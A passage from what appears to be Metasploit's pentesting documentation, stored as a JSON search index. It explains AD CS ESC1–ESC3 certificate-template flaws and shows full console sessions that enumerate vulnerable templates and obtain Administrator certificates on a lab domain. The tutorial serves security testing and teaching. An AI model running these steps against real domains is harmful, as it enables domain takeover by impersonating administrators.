authenticate as. Therefore, all an attacker needs to do is simply modify this field and they can gain a certificate that allows them to authenticate as any user they wish. ESC2 is similar to ESC1 in all respects, however it differs in one key area. This is because, unlike ESC1 vulnerable certificate templates, you cannot edit the subjectAltName field, of ESC2 vulnerable certificate templates. Additionally, ESC2 certificate templates define the Any Purpose extended key usage (EKU) or no EKU at all. This last part is important as it allows an attacker to utilize the ESC2 vulnerable certificate template to create a new certificate that can be used to authorize to log into a domain via Kerberos on behalf of any other user, thereby granting them access to the domain as that user. Note that certificates with no EKU at all will need to be trusted by the NTAuthCertificates object (which it won’t be by default), otherwise new certificates that are created using the vulnerable ESC2 certificate template will not work for domain authentication. This restriction does not apply for those certificates vulnerable to ESC2 which have the Any Purpose EKU applied to them. Next, ESC3 is fairly similar to ESC2, however it differs in two ways: a different EKU is abused, and the attacker also needs to utilize two different misconfigured certificate templates in order to exploit the vulnerability. The EKU in question this time is the Certificate Request Agent EKU, aka OID 1.3.6.1.4.1.311.20.2.1, which allows one to enroll for a certificate on behalf of another user, which may seem unusual, but this a common scenario within Microsoft environments. To abuse this EKU, an attacker must have the following two vulnerable certificate templates: . | A certificate template which has all the same permissions as ESC1, however it also has the Certificate Request Agent EKU set on it, aka OID 1.3.6.1.4.1.311.20.2.1. This certificate template is labeled as ESC3_TEMPLATE_1 within the output of the ldap_esc_vulnerable_cert_finder module we will use later on. | A certificate template that allows low privileged users to enroll in it, and has manager approval disabled, same as ESC1. However it also has either: . | A template schema of 1 | A template schema of 2 or greater and an Application Policy Issuance Requirement requiring the Certificate Request Agent EKU so that only those who have a certificate with this requirement can enroll in them. It must also define an EKU that allows for domain authentication, same as ESC1, and there must be no enrollment restrictions on the Certificate Authority (CA) server in question. This certificate template is labeled as ESC3_TEMPLATE_2 within the output of the ldap_esc_vulnerable_cert_finder module we will use later on. | . | . If both of these criteria are met then the attacker can enroll in one of the ESC3_TEMPLATE_1 vulnerable certificate templates as a low privileged user in order to get a certificate that will grant them Certificate Request Agent permissions. They can then use these permissions to enroll in a ESC3_TEMPLATE_2 vulnerable certificate template and request a certificate on behalf of another user, such as the domain administrator, and utilize the fact that the certificate template allows for domain authentication to log into the domain via Kerberos as that user. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#introduction-to-ad-cs-vulnerabilities",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#introduction-to-ad-cs-vulnerabilities"
  },"19": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Finding Vulnerable ESC Templates Using ldap_esc_vulnerable_cert_finder",
    "content": "Before one can exploit vulnerable ESC templates to elevate privileges, it is necessary to first find a list of vulnerable templates that exist on a domain. To do this we can run the auxiliary/gather/ldap_esc_vulnerable_cert_finder module. This module will connect to the LDAP server on a target Domain Controller (DC), and will run a set of LDAP queries to gather a list of certificate authority (CA) servers and the vulnerable certificate templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out which users or groups can use that certificate template to elevate their privileges. Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13 and ESC15. The module is limited to checking for these techniques due to them being identifiable remotely from a normal user account by analyzing the objects in LDAP. Keep in mind though that there are two sets of permissions in play here though. There is one set of permissions on the CA server that control who is able to enroll in any certificate template from that server, and second set of permissions that control who is allowed to enroll in a specific certificate template, which is applied to the certificate template itself. Therefore, the module will also specify which users are allowed to enroll in a specific template on a specific CA server, in order to make it as clear as possible which users or groups one needs to have access to in order to exploit the vulnerable certificate template. The following diagram showcases how this permissions check works in a more visual manner: . flowchart TD user[User] --&amp;gt; firstcheck{CA Server Allows Enrollment?} firstcheck{CA Server Allows Enrollment?} -- YES --&amp;gt; secondcheck{Certificate Template Allows Enrollment?} firstcheck{CA Server Allows Enrollment?} -- NO --&amp;gt; denied[Access Denied] secondcheck{Certificate Template Allows Enrollment?} -- NO --&amp;gt; denied[Access Denied] secondcheck{Certificate Template Allows Enrollment?} -- YES --&amp;gt; success[Access Granted!] . To run the module, you will need to have the login credentials of a domain joined user. The specific permissions of this user should not matter though, since most LDAP servers in an Active Directory (AD) environment are configured in such a way that they allow users to read most objects, but not write to them. For our purposes, since we just need to read the details of the certificate templates that are available, this means normal user permissions should be sufficient. To run the module, specify the login credentials for an AD user, and set RHOSTS to the address of one of the Domain Controller (DC) IP addresses, then enter run. This will cause the module to log into the LDAP server on the target DC, and list out the vulnerable certificate templates and which CA servers they are available from, as well as the permissions that are required to enroll in these certificate templates. The following is a sample output of running this against a test server: . msf6 &amp;gt; use auxiliary/gather/ldap_esc_vulnerable_cert_finder msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; show options Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder): Name Current Setting Required Description ---- --------------- -------- ----------- BASE_DN no LDAP base DN if you already have it DOMAIN no The domain to authenticate to PASSWORD no The password to authenticate with REPORT_NONENROLLABLE false yes Report nonenrollable certificate templates REPORT_PRIVENROLLABLE false yes Report certificate templates restricted to domain and enterprise admin RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit -framework/wiki/Using-Metasploit RPORT 389 yes The target port SSL false no Enable SSL on the LDAP connection USERNAME no The username to authenticate with View the full module info with the info, or info -d command. msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; set DOMAIN DAFOREST DOMAIN =&amp;gt; DAFOREST msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; set USERNAME normaluser USERNAME =&amp;gt; normaluser msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; set PASSWORD normalpass PASSWORD =&amp;gt; normalpass msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; run [*] Running module against 172.30.239.85 [*] Discovering base DN automatically [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] Template: ESC1-Template [*] Distinguished Name: CN=ESC1-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC1 [*] Notes: ESC1: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: ESC2-Template [*] Distinguished Name: CN=ESC2-Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC2 [*] Notes: ESC2: Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: ESC3-Template1 [*] Distinguished Name: CN=ESC3-Template1,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_1 [*] Notes: ESC3: Template defines the Certificate Request Agent OID (PkiExtendedKeyUsage) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: User [*] Distinguished Name: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_2 [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: Machine [*] Distinguished Name: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_2 [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-515 (Domain Computers) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [+] Template: ESC3-Template2 [*] Distinguished Name: CN=ESC3-Template2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC3_TEMPLATE_2 [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins) [*] * S-1-5-21-3290009963-1772292745-3260174523-513 (Domain Users) [*] * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins) [+] Issuing CA: daforest-WIN-BR0CCBA815B-CA (WIN-BR0CCBA815B.daforest.com) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; . From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However, whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate template. At that point you probably don’t need to elevate your privileges any higher, so this certificate template isn’t that useful for us. Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN- BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their privileges. Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack. ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but vulnerable to ESC3_TEMPLATE_2 attacks. We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack. Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and who’s issuing CA allows any authenticated user to request it. With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the ipcr_cert module to request certificates for authentication using the vulnerable certificate templates. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#finding-vulnerable-esc-templates-using-ldap_esc_vulnerable_cert_finder",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#finding-vulnerable-esc-templates-using-ldap_esc_vulnerable_cert_finder"
  },"20": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator",
    "content": "Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can. Luckily we can also do this with the icpr_cert module. We just need to also set the ALT_SID and ALT_UPN options to specify who we would like to authenticate as instead. Note that this only works with certificate templates that are vulnerable to ESC1 due to having the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set. If we know the domain name is daforest.com and the domain administrator of this domain is named Administrator we can quickly set this up: . msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA daforest-WIN-BR0CCBA815B-CA CA =&amp;gt; daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC1-Template CERT_TEMPLATE =&amp;gt; ESC1-Template msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain DAFOREST SMBDomain =&amp;gt; DAFOREST msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000 ALT_SID =&amp;gt; S-1-5-21-3402587289-1488798532-3618296993-1000 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_UPN [email protected] ALT_UPN =&amp;gt; [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000 [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216143830_default_unknown_windows.ad.cs_338144.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . We can then use the kerberos/get_ticket module to gain a Kerberos ticket granting ticket (TGT) as the Administrator domain administrator. See the Getting A Kerberos Ticket section for more information. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#using-the-esc1-vulnerability-to-get-a-certificate-as-the-domain-administrator",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#using-the-esc1-vulnerability-to-get-a-certificate-as-the-domain-administrator"
  },"21": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC2 To Gain Domain Administrator Privileges",
    "content": "From the previous enumeration efforts we know that the following certificate templates are vulnerable to ESC2: . | SubCA - Not exploitable as you have to be a Domain Admin or Enterprise Admin to enroll in this certificate | ESC2-Template - Enrollable by any authenticated user that is part of the Domain Users group, aka any authenticated domain user. | . We will use ESC2-Template to gain a TGT as the domain administrator user. To do this we will use the ipcr_cert module and we will set the usual options, however we will need to run it twice. This is because with ESC2, we can’t use the vulnerability to request authentication certificates as other users without the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag being set on the template. Instead what we can do is use the Any Purpose EKU or SubCA EKU that are set on these certificates to authenticate to the domain as the user who requested the certificate. So what we do is first get a ESC2 vulnerable certificate, then abuse the ability to use that certificate for any purpose to then request a certificate on behalf of another user, using that certificate as the form of authentication for this operation. For the first run, we will set the usual RHOSTS, CA, and CERT_TEMPLATE details, being sure to set CERT_TEMPLATE to the vulnerable ESC2-Template certificate template, and supply valid SMB login credentials. This will grant us a certificate for our current user that is based off of the vulnerable ESC2-Template: . msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA daforest-WIN-BR0CCBA815B-CA CA =&amp;gt; daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC2-Template CERT_TEMPLATE =&amp;gt; ESC2-Template msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain DAFOREST SMBDomain =&amp;gt; DAFOREST msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC2-Template yes The certificate template ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\\USER) PFX no Certificate to request on behalf of RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/metas ploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Next, we need to use the PFX file that we got to request another certificate to authenticate on behalf of another user. We will use the PFX option to specify the PFX file, and the ON_BEHALF_OF setting to specify the user we would like to authenticate on behalf of. Finally we will change the certificate template to another certificate template that we are able to enroll in. The default User certificate should work here since it allows enrollment by any authenticated domain user. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC2-Template yes The certificate template ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\\USER) PFX no Certificate to request on behalf of RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/metas ploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ON_BEHALF_OF DAFOREST\\\\Administrator ON_BEHALF_OF =&amp;gt; DAFOREST\\Administrator msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set PFX /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx PFX =&amp;gt; /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE User yes The certificate template ON_BEHALF_OF DAFOREST\\Administrator no Username to request on behalf of (format: DOMAIN\\USE R) PFX /home/gwillcox/.msf4/loot/2022 no Certificate to request on behalf of 1216154930_default_unknown_win dows.ad.cs_104207.pfx RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/me tasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . We can then use the kerberos/get_ticket module to gain a Kerberos ticket granting ticket (TGT) as the Administrator domain administrator. See the Getting A Kerberos Ticket section for more information. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc2-to-gain-domain-administrator-privileges",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc2-to-gain-domain-administrator-privileges"
  },"22": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC3 To Gain Domain Administrator Privileges",
    "content": "To exploit ESC3 vulnerable templates we will use a similar process to ESC2 templates but with slightly different steps. First, let’s return to the earlier output where we can find several templates that are vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other principals (such as users or computers). The second part of this attack will then require that we co-sign requests for another certificate using the certificate that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do this we will need to look for certificates in the ldap_esc_vulnerable_cert_finder module which are labeled as being vulnerable to the ESC3_TEMPLATE_2 attack. The list of ESC3_TEMPLATE_1 vulnerable templates is pretty short and consists of a single template: . | ESC3-TEMPLATE-1 - Vulnerable to ESC3_TEMPLATE_1 and allows enrollment via any authenticated domain user. | . ESC3_TEMPLATE_2 are more plentiful though and we can find a few that are of interest: . | SubCA - Again as mentioned earlier can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector. | ESC3-Template2 - Enrollable via any authenticated domain user. | User - Enrollable via any authenticated domain user. | Administrator - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector. | Machine - No real overlap between Domain Computers and Authenticated Users I don’t think? | DomainController - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector. | . Narrowing this list down to those we can actually enroll in as users, this leaves us with User and ESC3-Template2 as templates that can be used for the second part of this vulnerability. We’ll first get the cert using ipcr_cert with the ESC3-Template1 certificate. msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA yes The target certificate authority CERT_TEMPLATE User yes The certificate template ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\\USER) PFX no Certificate to request on behalf of RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framew ork/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain DAFOREST SMBDomain =&amp;gt; DAFOREST msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA daforest-WIN-BR0CCBA815B-CA CA =&amp;gt; daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC3-Template1 CERT_TEMPLATE =&amp;gt; ESC3-Template1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; loot Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216173718_default_unknown_windows.ad.cs_580032.pfx windows.ad.cs certificate.pfx application/x-pkcs12 DAFOREST\\normal Certificate /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Next, we’ll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the User template for this: . msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx PFX =&amp;gt; /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ON_BEHALF_OF DAFOREST\\\\Administrator ON_BEHALF_OF =&amp;gt; DAFOREST\\Administrator msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC3-Template1 yes The certificate template ON_BEHALF_OF DAFOREST\\Administrator no Username to request on behalf of (format: DOMAIN\\USE R) PFX /home/gwillcox/.msf4/loot/2022 no Certificate to request on behalf of 1216174221_default_unknown_win dows.ad.cs_027866.pfx RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/me tasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174559_default_unknown_windows.ad.cs_570105.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Just to show this is also possible with ESC3-Template2 here is a snippet showing that also works: . msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set 